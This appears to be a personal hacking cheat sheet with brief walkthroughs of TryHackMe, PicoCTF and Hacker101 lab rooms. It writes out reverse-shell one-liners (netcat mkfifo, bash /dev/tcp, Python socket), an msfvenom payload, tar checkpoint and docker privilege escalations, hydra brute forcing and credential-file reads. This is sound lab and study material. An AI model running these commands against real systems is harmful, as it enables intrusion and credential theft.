Hack Notes

🚩 A collection of notes, commands, & links to help w/ hacking & cybersec. Work in progress, please be patient while it’s updated.

CyberChef // GTFOBins // HackTricks // RevShells // PayloadsAllTheThings

🔥 Kill Chain

General

CTRL + SHIFT + UP|DOWN # scroll
CTRL + SHIFT C|V # Copy|Paste
nl # cat w/ line nums
sed # stream editor
ip= # set alias env var
echo $ip # test alias

Recon/Enumeration

rustscan

rustscan -a $ip -g
rustscan -a $ip -p $ports -- -sC -sV | tee scan.init

nmap

nmap -vv -Pn $ip
nmap -vv -Pn -p $ports -A $ip

feroxbuster

feroxbuster -u http://$ipa -w $wordlist | tee fuzz.init

FFUF

ffuf -u http://$ip/FUZZ -w $wordlist | tee fuzz.init

firefox

Analysis: Whatruns, Wappalyzer
/robots.txt, sitemap(.xml)

smb

enum4linux $ipa | tee enum4.txt # smb shares

Exploitation

searchsploit ^
- searchsploit -m $number $location # Copy
- searchsploit -w $term # Website

Shells - Reverse

nc (netcat)

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc $ip $port >/tmp/f
nc -e /bin/bash $ip $port

Linux Enumeration

ls -la /home
cat /etc/passwd
cat /etc/crontab
sudo -l # run sudo with?
find / —perm 4000 2>/dev/null # find suids
find / -user $user 2>/dev/null # find user files
find / -name *id_rsa* 2>/dev/null # find files that match id_rsa

Full TTY | Spawn Shells ^ ^

python -c "import pty; pty.spawn('/bin/bash')"
python3 -c "import pty; pty.spawn('/bin/bash')"

/bin/sh -i

[CTRL+Z]
stty raw -ech;fg
export TERM=xterm

pspy 🔗

Forensics

strings
exiftool
binwalk
pdfinfo

Hashes

hashid
namethathhash (nth)
Git
- git add . && git commit -m “$comment” && git push
- Generate token, use as password.
Repos
https://github.com/overgrowncarrot1/Scripts

Windows

cmd.exe

dir # list contents
cd # change dir
type # cat file contents
type $file | clip # copy to clipboard

📝 Notes

🐀 Broad Scope Bug Bounties From Scratch - XSS Rat
Bug bounty != Pentesting, it’s testing targets with skillset.
Platforms: public(Intigriti, HackerOne, Bugcrowd), private.
Target: B2B|B2C, Wide Scope|Main App, Web|Mobile|Desktop|IP|IOT, VDP|Paid, Public|Private.
- Avoid: high payout|banks (hardened), newspapers (paywall), mobile|webshops, no creds.
Invites: be active, report, ctfs (lower qual).
Subdomains: httprobe ^ finds working http(s).
- Flyover: Aquatone,

Computing Fundamentals - Roppers Academy

Computer Science 50 Python (CS50P)

Automate The Boring Stuff with Python

✍ Writeups

👳‍♂️ Aman CTF

Getting started: inspect > comment
Attack on EU: doc > “Types of Internet Banking Attacks”
Pharming: search ^ ^ ^
Phising hacker: search ^
Securing External Link: search ^
Linux folder: search ^

💻 Hacker101

A little something to get you started
- Browser > inspect > /background.png
Micro-CMS v1
Postbook
Flag0
- user:password
Flag1
- My profile > ?page=profile.php&id=d # change d to b or c
Flag2
- new post > inspect > form
- <input type="hidden" name="user_id" value="$ANYTHING">
Flag3
- 189 * 5 = 945
- post > change &id=945
Flag4
- page=view.php&id=945 > page=edit.php&id=945
Flag5
- Browser > inspect > application > cookie id:$string
- nth $string = md5
- echo $string > $file
- john --format=Raw-MD5 --wordlist=rockyou.txt $file
- echo -n '1' | md5sum
- Browser > inspect > application > cookie id:$md5hash
Flag6
- Login > user:password
- echo -n '1' | md5sum
- ?delete=$md5hash
Petshop Pro
Flag0
- Burp > /checkout > Repeater > Inspector “Request Body Paramaters”
- Change price of image to $0.00
Flag1 - NOT WORKING
- hydra -L $xato-net-10-million-usernames -p password $domain|ip http-post-form “/login/:username=^USER^&password=^PASS^:Invalid username” -o pass.txt -v

🗃 Kase Scenarios

🐍 Betrayal
People
- Rhett Blackwood: FB, FB G, YT
Scene of the Crime
- Alarm System: Toward Kitchen P*******n O
- Computers: Office x3
- Password: ^ ^ ^ - s*ar
- Stairs: ruler > top > bottom 1*
Late Night Escape Challenges
- Google Lens > ^ > C******* C*******
- Guess > F*******
- Profile > ^ > URL:1374270*3
- wget $jpg > exiftool $jpg > Date/Time Original > 2*:1*
- Life Insurance: wget $zip > open $pdf > $*,000,000.00
- C*e and Rt
Online Troll
- YouTube > Facebook > R****
🌊 Dark Waters | Writeup Part 1, Part 2
People
- P - author of letter, hand written, “test the water”
- Lisa - young, bar owner, offered room. some event.
- Protestor - biology student @Penn State York, was watched/harrased, claims GRPC,
  - William Heathcote - great-gf 1837 had issues w/ GRPC.
- GRPC - local paper co, holding event, 4 employees (Patti), hosting 100th ann,
- Alexander Ross - politiain, linked to GRPC.
Location
- Glen Rock, Pennsylvania
Unknown Email: [email protected]
r/g****************e ^
- Incoming cache drop S**********r ^ ^ ^
Arkg sylbire: Ynxr Zneohet (ROT13)
- Next flyover: Le M***g

🚩 ******************n00bzctf 2023 | YouTube Writeup

Forensics
Crack & Crack:
- zip2john $zip > $hash, john $rockyou $hash ^
- pdf2john $pdf > $hash, john $rockyou $hash ^ ^
Avengers ^
- Research ffmpeg + tesseract ^ ^ ^
- sudo apt install ffmpeg tesseract-ocr tesseract-ocr-eng
- ffmpeg -i flag.avi -vf fps=1 frames/frame_%04d.jpg
- for image_file in frames/*.jpg; do tesseract "$image_file" "output/$(basename "${image_file%.*}")"; done
- cat output/* > all.text, copied > CyberChef ^
Misc
Sanity: /rules > inspect > 
ASL: this + notepad
Google Form 1: inspect > CTRL + F “n00bz”
My Chemical Romance: this > 186808155710 > 18 68 08 15 57 10 > Ar Er O P La Ne > {aeroplane}
OSINT
Mission Moon
- Reverse Image Search ^ > India’s Vikram ^ > Chandrayaan 2 Coords ^
Damn: Rev Img ^ > CNN ^ > GMaps ^
Pwn
Flag Shop: 2 > 1124151235124512 (large number)
Rev
- welcome strings $file
Web
Club_N00b: $site > /check?secret_phrase=radical
Robots: $site > /robots.txt
Secret Group: Burp Repeater > change headers user-agent, connection etc.
Conditions: Burp Repeater > username=ᾉᾉᾉᾉᾉᾉᾉᾉᾉᾉᾉᾉᾉ ^

🎓 PicoCTF

Cryptography
Mod 26: CyberChef (ROT13)
Mind your Ps and Qs: rsactftool ^
Forensics
information: exiftool $file, CyberChef (From Base64)
Matryoshka doll: binwalk $file, unzip cd x4, cat $file
Glory of the Garden: xxd $file *see end
Enhance!: subl $file *manually extracted
General Skills
runme.py: python $file
Serpentine: move print_flag(), python $file
First Find: wget $link, unzip $file, cat $pathToFile
Big Zip: grep -r pico $dir
Based: CyberChef
plumbing: nc $domain $port > file, cat file | grep pico
mus1c: rockstar, CyberChef (From Decimal)
flag_shop: 2,1,3578290,2,2,1
1_wanna_b3_a_r0ck5tar: remove lines
Web
GET aHEAD: Burp > Repeater, HEAD ^
Cookie:
- Burp > Repeater > name=18
- Inspect > Storage > Value 1,2,3,4,etc
Insp3ct0r: Inspect HTML, CSS & JS files for comments.
Scavenger Hunt: Insp3ct0r but robots.txt, .htaccess, & .DS_Store.
More Cookies
- Base64 cookie
where are the robots: /robots.txt
logon: Burp > proxy random login
- Cookie: username=Joe; admin=True; password=
dont-use-client-side: view source > js
It is my Birthday:
Who are you?: Burp > Repeater > Add Headers
- Referer: $URL ^
- Date: 2018 ^
- DNT: 1 ^
- X-Forwarded-For: 103.81.143.0 ^ ^
- Accept-Language: sv-SE ^
login: view-source > /index.js (CyberChef Base64)

☁ TryHackMe | Free $5 Credit

🔐 Anonforce
Writeup: YouTube // Blog
rustscan -a $ip, 21:ftp 22:ssh
ftp $ip, anonymous
user = m*******
get user.txt
- cat ~/user.txt
get /notread/*
- gpg2john private.asc > private.hash
- john --wordlist=/rockyou.txt private.hash
- x******
gpg 🔗 🔗
- gpg -d backup.pgp
nano root.hash
- hashcat root.hash rockyou.txt
- h*****
ssh root@$ip
🏘 Attacktive Directory (AttacktiveDirect)
Writeup: YouTube
kerbrute userenum --dc THM-AD -d spookysec.local userlist.txt
🍺 Bounty Hacker
Writeup: YouTube // Blog
rustscan -a $ip -p $ports – -sC -sV
ftp -A $ip ^
hydra -l $user -P l****.txt $ip ssh
sudo -l, tar ^
🦉 c4ptur3th3fl4g (capturetheflag)
Writeup: YouTube // Blog
- leet
- binary
- base32
- base64
- hex
- ROT13
- ROT47
- morse
- decimal
- base64 > morse > binary > ROT47 > decimal
- Audacity > spectrogram view
- steghide –extract -sf
- strings

❄ Coldbox Easy

80:http,4512:ssh

http
	- wordpress
	- ffuf:/******/
	- users:****,****,*****

	msfconsole -q
		- setg RHOSTS
		- use wordpress_ghost_scanner, wordpress_xmlrpc_dos, wordpress_xmlrpc_login, wordpress_pingback_access

	wpscan --url http://$ip -e vp,vt,u
	wpscan --url http://$ip --passwords $wordlist
		- *****:*********
		- Appearance > Editor > PHP Pentest Monkey Rev Shell

# Initial Access www-data
cat /var/www/html/wp-config.php
	- DB_NAME: ******, DB_USER:*****, DB_PASSWORD:************
cat /etc/passwd/ 
ssh c0ldd@$ip -p 4512
cat user.txt

# PrivEsc
sudo -l
sudo vim, :sh

🚪 Corridor
Writeup: YouTube // Blog
rustscan: 80,http
source: map tags w/ hash dirs > hash.txt
hashcat hash.txt /rockyou.txt
echo -n $number | md5sum
firefox: http://$ip/$md5sum
🔎 Content Discovery
Content: assets (files, vids, imgs…), features + more.
Discovery (methods): manual, automated and OSINT + combination.
Manual: /robots.txt, favicon | md5sum ^, sitemap.xml, headers curl $ipa -v, framework stack via comments, (c) notices or credits.
OSINT: GoogleDork(site, inurl, filetype, intitle), wappalyzer, wayback, github, S3 Buckets http(s)://{name}.s3.amazonaws.com.
Automated: fuzzing(dirb, gobust, fuff, ferox).
🛋 Couch
Writeup: YouTube (Coming Soon)
rustscan
Research ^
ssh user:password
- cat .bash_history
- docker -H 127.0.0.1:2375 run --rm -it --privileged --net=host -v /:/mnt alpine
- cat /mnt/root/root.txt
🚩 CTF Collection Volume 1 (ctfcollectionvol1)
Writeup: YouTube // Blog (Coming Soon)
- CyberChef > base64
- strings $file or exiftool
- steghide --extract -sf $file
- Inspect (CTRL + SHIFT + C)
- zbarimg $file ^
- strings $file
- CyberChef > Base58
- CyberChef > ROT13 > ROT7
- Inspect (CTRL + SHIFT + C)
- xxd -p $file > $newFile
  - nano $newFile, replace 2333445f w/ 89504E47 ^
  - CyberChef > Upload $newFile > From Hex > Render Image
- Google Dork site:"reddit.com" intext:"THM" intitle:"tryhackme"
- nano $file, beef $file
- XOR Calculator > ASCII (base 256)
- binwalk $file, unzip $file
- stegsolve
- zbarimg $file, https://sclouddownloader.net/
- Wayback
- Decode > Automatic > Key = THM
- Dec > Hex > ASCii
- wireshark > filter http.request.method == “GET” > Follow HTTP Stream
🕺 Dav
Writeups: Twitter // YouTube // Blog (Coming Soon)
rustscan
- 80
- Apache/2.4.18
feroxbuster
- /webdav
Try: Burpsuite - bruteforce basic http auth
Search - webdav default credentials ^
- w*****:x*****
hashid $hash
Try: MD5(APR) or Apache MD5 ^
- hashcat -m 1600 hash.txt $rockyou.txt
cadaver <http://$ip/webdav> ^
- revshell = shell.php
- put shell.php
- nc -lnvp $port
- http://$ip/webdav/shell.php
Upgrade Shell
- python3 -c "import pty; pty.spawn('/bin/bash')"
- [CTRL+Z]
- stty raw -echo;fg
- export TERM=xterm
PrivEsc ^
- sudo -l = /bin/cat
- cat /etc/shadow
- cat /root/root.txt
🥜 Easy Peasy
Writeup: YouTube // Blog
rustscan: 80:http, 6498:ssh, 65524:http
feroxbuster: 80, /hidden/whatever, view-source:base64
65524:viewsource search “flag”
65524/robots.txt ^, view-source:Base62 = $directory
- hashcat -m 6900 $hash $dict
- steghide –extract -sf $img, cat $file.txt, binary cyberchef
- ssh b*****@$ip -p 6498
cat crontab, nano $file > revshell ^, cat $.root.txt
🎮 Gaming Server
Writeup: YouTube // Blog
rustscan -a $ip, 22:ssh, 80:http
feroxbuster: /u*****s/, /s****t/
user = j***, pw = dict.lst
ssh2john $key > $hash, john $hash dict.lst l*****n, chmod 600 $key
wget ^, chmod +x $file, python -m http.server 80
- bash build-alpine
- mv /mnt/root
🔥 Ignite
Writeup: YouTube // Blog
rustscan
- 80
- a****:a****
searchsploit Fuel
- searchsploit -m 50477
- https://www.exploit-db.com/exploits/50477
- RevShell
  rm -f /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.4.1.107 4242 >/tmp/f
- Upgrade Shell
  - python3 -c "import pty; pty.spawn('/bin/bash')"
  - [CTRL+Z]
  - stty raw -echo;fg
  - export TERM=xterm
- cat /fuel/application/config/database.php
su root
🔎 Investigating Windows
Writeup: YouTube // Blog
RDP via Remmina
- cmd > systeminfo
- Get-LocalUser | Select Name,LastLogon
- regedit > HKEY_LOCAL_MACHINE > SOFTWARE > Microsoft > Windows > CurrentVersion > Run
- Computer Management > Groups > Administrator
- Event Viewer > Event ID 4634 ‘Log off’
  - Alternative: net user John
- C:\TMP
- C:\Windows\System32\drivers\etc
- C:\inetpub\wwwroot
- Firewall > Inbound Rules > 1337
📚 Library
Writeup: YouTube // Blog
rustscan: 22,80=Apache2.4.18
robots.txt
- rockyou ^ ^ ^
Users - m*******
hydra SSH bruteforce ^
- hydra -l m******* -P $rockyou $ip ssh -t 4 -vv
- i********
rm bak.py
nano bak.up
- import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("$ip",$port));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("sh")
🏹 Lian Yu
Writeup: YouTube // Blog
rustscan: ftp, ssh, http
feroxbuster x3 big.txt dir-medium.txt
- /island/2100/green_arrow.ticket
- B***58
ftp > mget *
- hexedit $broken.png, fix magic header ^
- stegseek $jpg
ssh $s***e $shado
- sudo -l ^
- sudo pkexec /bin/sh
🎩 Madness
Writeup: YouTube // Blog
rustscan: 22,80
http: view source
- wget $jpg
hexedit $jpg, magic number ^
- http://$ip/$directory?$variable=$number
Burp: intruder, payload 0-99
steghide —extract -sf $image
find / -perm -4000 2>dev/null
- screen 4.05.00 ^, exploit db ^
📃 MD2PDF
Writeup: YouTube // Blog
rustscan: 5000
gobuster -w /seclists/common.txt = /admin
🎭 Mr Robot (WIP)
Writeup: YouTube // Blog
- rustscan: 80, 443
- /robots.txt: $dic
- ferox -kE -x js php html css etc.
- /wp-login.php
  - wpscan –disable-tls-checks
- hydra ^
🏡 Neighbour
Writeup: YouTube // Blog
firefox:
- http://$ip, CTRL+U guest:guest
- http://$ip/profile.php?user=admin
🐱‍👤 Ninja Skills
Writeup: YouTube // Blog
find / -type f ( -name 8V2L -o -name bny0 -o -name c4ZX -o -name D8B3 -o -name FHl1 -o -name oiMO -o -name PFbD -o -name rmfX -o -name SRSq -o -name uqyw -o -name v2Vb -o -name X1Uy ) 2»/dev/null
🔓 Overpass
Writeup: YouTube // Blog
l****.js > Cookie: SessionToken=statusOrCookie > firefox add cookie
- ssh2john key > hash
- john hash rockyou.txt
- passphrase:j*****3
- ls .o******* > ROT47 ^
- [{“name”:“S*****”,“pass”:“s*******************e”}]
cat /etc/crontab
- nano /etc/hosts > add $localip
- Add revshell to crontab/$file, locally > nc
🥒 Pickle Rick
Writeup: YouTube // Blog
rustscan -a $ip
feroxbuster -x js php html css etc.
- index source: user
- robots.txt: pw
/l****.php
- while read line; do echo $line; done < $file ^
- ls -la /home/
- sudo -l
- sudo cp /root/$file .
👨‍💻 RootMe
Writeup: YouTube // Blog
rustscan -a $ip -p $ports – -sC -sV
feroxbuster -x js php
- u*******
- p****
Burp > Intruder FUZZ > .php* ^
SUID ^ - find / -perm /4000
python -c 'print(open("/****/****.txt").read())’ ^

🔴 Res

Research: [HackTricks](https://book.hacktricks.xyz/network-services-pentesting/6379-pentesting-redis) [^](https://redis.io/docs/data-types/), Webshell [^](https://redis.io/docs/data-types/)

redis-cli -h $ip

msfconsole -q
search redis
use scanner/redis/file_upload
 - set LocalFile $shell
 - set RemoteFile /var/www/html/

linpeas: xxd, GTFO Bins [^](https://gtfobins.github.io/gtfobins/xxd/)
- cat /etc/passwd
- copy hash > $file

🤖 Skynet

rust:22,80,445...

enum4linux: //$ip/anonymous|m*********n

ffuf: /s**********l

hydra -l m*********n -P l**1.txt $ip http-post-form "/s**********lsrc/login.php:login_username=^USER^&secretkey=^PASS^:Unknown user or password incorrect." -vV -t 1

smb
 - m*********n:)**************`
 - notes/i********t.txt

http://$ip/4**************d
 - ffuf=/a***********r

searchsploit -m 2***1
 - /alerts/alertConfigField.php?urlConfig=../../../../../../../../../home/m*********n/user.txt
 - /alerts/alertConfigField.php?urlConfig=http://$ip/shell.php?

cat /etc/crontab
 - /home/m*********n/backups/backup.sh
 - echo 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc $10.4.38.220 3333 >/tmp/f' > shell.sh
 - touch --checkpoint-action=exec=sh shell.sh
 - touch "/var/www/html/--checkpoint=1"

🌶 Startup

21,22,80
M***
/f****
ftp=Anonymous Login
shell.php ^ /files/ftp
cat /recpie.txt
get s********.pcap
l*****:c*****************
ssh@l*****
cat user.txt
cd scripts
echo '$shell.sh' > /etc/print.sh
nc -lvnp $port

🐱 Thompson
Writeup: YouTube // Blog
rustscan
- 8009
- 8080
feroxbuster
- /host-manager/
- /manager/
- t*****:s*****
- Upload RevShell
  msfvenom -p java/jsp_shell_reverse_tcp LHOST=$ip LPORT=$port -f war > reverse.war strings reverse.war | grep jsp # in order to get the name of the file
- Upgrade Shell
  - python3 -c "import pty; pty.spawn('/bin/bash')"
  - [CTRL+Z]
  - stty raw -echo;fg
  - export TERM=xterm
- /home/j***/id.sh
- nano id.sh
  - bash -i >& /dev/tcp/$ip/$port 0>&1
🌐 Web Application Security
Writeup: YouTube (Coming Soon)
Web app: app w/out install on remote server e.g. gmail, office on., etsy.
Identify/Auth Fail: bruteforce-attk, weak|clear-text passowrds.
Broken Acc. Control: not least priv (IDOR), mod other users data, access other pages without auth.
Injection: input w/ malious code to trick app.
Crypt Fail: HTTP != HTTPS, weak crypt e.g. ROT13, default keys e.g. 1234.
- Tweet
🐱‍🐉 WGEL
Writeup: YouTube // Blog
rustscan: 22 ssh, 80 http
firefox: http://$ip, view source
gobuster: /sitemap/, /sitemap/.ssh
ssh j****e:key, chmod 600 key
sudo -l, /usr/bin/wget
- local: python -m http.server, remote: wget http://$ip/linpeas.sh
- chmod +x linpeas.sh
CVE-201-4034 ^ ^
- gcc cve-2021-4034-poc.c -o cve-2021-4034-poc
🐇 Year Of The Rabbit
Writeup: YouTube // Blog
rustscan -a $ip -p $ports – -sC -sV
feroxbuster
/a****s/ > css comment
burp > repeater > header /W*********U
wget $png > binwalk > binwalk -e | strings $png
copy/paste passwords > hydra -l f****** -P $file $ip ftp
ftp -A $ip > get $file.txt > beef $file.txt
find / -name s3cr3t 2>/dev/null, su g*********e
sudo -u#-1 /usr/bin/vi /home/g*********e/user.txt

🔥 Kill Chain#

Recon/Enumeration#

Exploitation#

Linux Enumeration#

📝 Notes#

✍ Writeups#